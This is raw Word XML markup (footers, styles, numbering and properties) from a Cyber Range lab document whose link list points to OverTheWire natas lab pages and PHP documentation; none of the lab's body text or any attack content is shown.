      </w:drawing>
    </w:r>
  </w:p>
  <w:p w14:paraId="1DD875CF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2021 Cyber Range.  Created by R. Eric Kiser. </w:t>
    </w:r>
    <w:hyperlink r:id="rId2">
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(CC BY-NC-SA 4.0)</w:t>
      </w:r>
    </w:hyperlink>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="0563C1"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:u w:val="singl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36D7" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2021 Cyber Range.  Created by R. Eric Kiser. </w:t>
    </w:r>
    <w:hyperlink r:id="rId1">
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(CC BY-NC-SA 4.0)</w:t>
      </w:r>
    </w:hyperlink>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="0563C1"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:u w:val="single"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="06FA460B" wp14:editId="4A5DDB07">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5562600</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-90725</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="867410" cy="407670"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
          <wp:docPr id="2741" name="image7.png" descr="https://lh4.googleusercontent.com/jc5r0tAfahI12-oPOY9qjcQtnBJFttC9vXuM3CSY4qQww3uoxehkcfhR06YeZrjoE0CFADMKXBHIiBa3udgmqb0k3C6avQG6nr28s6QQK73B1oL9SUNz79O-cbgHLZJMvgLgldtSX2Q"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.png" descr="https://lh4.googleusercontent.com/jc5r0tAfahI12-oPOY9qjcQtnBJFttC9vXuM3CSY4qQww3uoxehkcfhR06YeZrjoE0CFADMKXBHIiBa3udgmqb0k3C6avQG6nr28s6QQK73B1oL9SUNz79O-cbgHLZJMvgLgldtSX2Q"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:srcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="867410" cy="4076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3FA89" w14:textId="77777777" w:rsidR="00037313" w:rsidRDefault="00037313">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5398F8AE" w14:textId="77777777" w:rsidR="00037313" w:rsidRDefault="00037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9FF3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">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2E60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92705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F0A03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C9E2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1363D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58960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6E376C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C66CC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DD0B22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7863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2E0799"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62C45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772B62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11EE1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1724FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB0A1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AC266E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00144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86348F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00506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89348B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB84A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F3637A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13CE2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FD3FE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EEA2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303BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C1C3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68062F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA2A0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940689"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE368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3141D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FA43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481C95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88BE6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936D4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6503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3211A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EEEB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DC12ACE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5B41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6E5FFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D384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975493"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FD8E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942512"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB569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9E65A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F30E0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E213FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95B6E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1691E33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DC46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6E03D40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC2A9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C051E19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C04A6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2197774">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1168599666">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="697893303">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1282877390">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1514415354">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="641470600">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1723405722">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1969432612">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1646743464">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1720015982">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="70858168">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1709069594">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1482428302">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1906716799">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="869417889">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1967999844">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="524174144">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="742795426">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="340473726">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="614211988">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1411385677">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="663509917">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="183328158">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1789547474">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="290288589">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1817146280">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="470944341">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="770321150">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="8475965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561"/>
    <w:rsid w:val="00016888"/>
    <w:rsid w:val="00026AC2"/>
    <w:rsid w:val="000342D2"/>
    <w:rsid w:val="00037313"/>
    <w:rsid w:val="001074AB"/>
    <w:rsid w:val="00224E99"/>
    <w:rsid w:val="002C67FD"/>
    <w:rsid w:val="00317D4D"/>
    <w:rsid w:val="00375A47"/>
    <w:rsid w:val="004A54E5"/>
    <w:rsid w:val="00520561"/>
    <w:rsid w:val="005D1F08"/>
    <w:rsid w:val="005D639C"/>
    <w:rsid w:val="005E5BE8"/>
    <w:rsid w:val="00714309"/>
    <w:rsid w:val="008866CC"/>
    <w:rsid w:val="009A5148"/>
    <w:rsid w:val="009D47AC"/>
    <w:rsid w:val="00A61D8F"/>
    <w:rsid w:val="00B552F9"/>
    <w:rsid w:val="00B670F6"/>
    <w:rsid w:val="00B82481"/>
    <w:rsid w:val="00C4132D"/>
    <w:rsid w:val="00C41BEC"/>
    <w:rsid w:val="00C55895"/>
    <w:rsid w:val="00C73782"/>
    <w:rsid w:val="00E24BC6"/>
    <w:rsid w:val="00F13ACA"/>
    <w:rsid w:val="00FB3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B7558"/>
  <w15:docId w15:val="{2AA42DB5-E740-47A5-9F7D-E3C6475E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86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9557B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C17171"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C17171"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C17171"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C17171"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D47E71"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D47E71"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LO-normal">
    <w:name w:val="LO-normal"/>
    <w:qFormat/>
    <w:rsid w:val="00D12C1C"/>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002F369D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="jquery-once-1-processed">
    <w:name w:val="jquery-once-1-processed"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F369D"/>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styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F369D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A2328F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED58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8AA"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00352F3D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention2">
    <w:name w:val="Unresolved Mention2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00352F3D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00913882"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention3">
    <w:name w:val="Unresolved Mention3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003929D2"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006470A6"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>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284B20"/>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table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="005D6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natas15.natas.labs.overthewire.org/index.php?debug"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atas13.natas.labs.overthewire.org/index-source.html"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gist.github.com/wcc526/d404c7a95439196756b0"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hp.net/manual/en/function.exif-imagetype.php"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natas15.natas.labs.overthewire.org/index.php?debug"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42.png"/></Relationships>
</file>

<file path=word/_rels/footer3.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NN4dImWsDINjJBfhO2AD2XoT+A==">AMUW2mU05i96A1QbqMXkJANPosr7QZy8ib5m/YeFULjM6piNok4R364JfDcAE2o/qlB2kgccCei9/Jj40XGBmbV1q3pU+c9c8aQDHZZBQ65XpUUs8o9LbVXgHD+owxA76dJnG4VWTw57nGktSLCy+PtZxXXiuFUcFwqZJ29M5HAQhpNkeQM15sPhmhdvlBbO9hxoz4kMFF0v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20</Pages>
  <Words>1691</Words>
  <Characters>9644</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>80</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Alysia Beckles</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-07T01:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-07T04:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>